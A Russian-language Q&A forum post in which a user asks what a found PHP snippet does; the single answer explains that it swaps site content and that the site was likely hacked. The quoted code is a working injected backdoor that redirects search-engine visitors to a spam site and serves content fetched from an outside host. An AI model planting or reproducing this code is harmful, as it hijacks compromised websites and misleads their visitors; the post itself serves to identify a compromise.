Для чего нужен этот код - вопрос №2526603

<?php
$ref = strtolower($_SERVER['HTTP_REFERER']);
if (strpos ($ref, 'google') !== false || strpos ($ref, 'yahoo') !== false || strpos ($ref, 'bing') !== false || strpos ($ref, 'aol') !== false || strpos ($ref, 'ask') !== false || strpos ($ref, 'search') !== false) {
$tiaourl = «regrowhairprotocols.com/»;
header(«location: ». $tiaourl);
exit;}
if(isset($_GET['view']))
{
$content= file_get_contents('http://search-hot.com/libs/ext/tcserver.php?id='.$_GET

['view']."&from=".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?view');
$content=str_replace("?view=","",$content);
echo $content;
exit();
}
$content= file_get_contents('http://search-hot.com/libs/ext/tcserver.php?from='.$_SERVER

['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?view');
$content=str_replace("?view=","",$content);
echo $content;
exit();
?>
1 ответ

Ответы

На сколько я понял, данный скрипт выполняет подмену содержимого на сайте. Если Вы обнаружили его у себя, то скорее всего Ваш сайт был взломан.

—
Если Вы получили ответ на свой вопрос, не забывайте пожалуйста выбрать «Лучший ответ».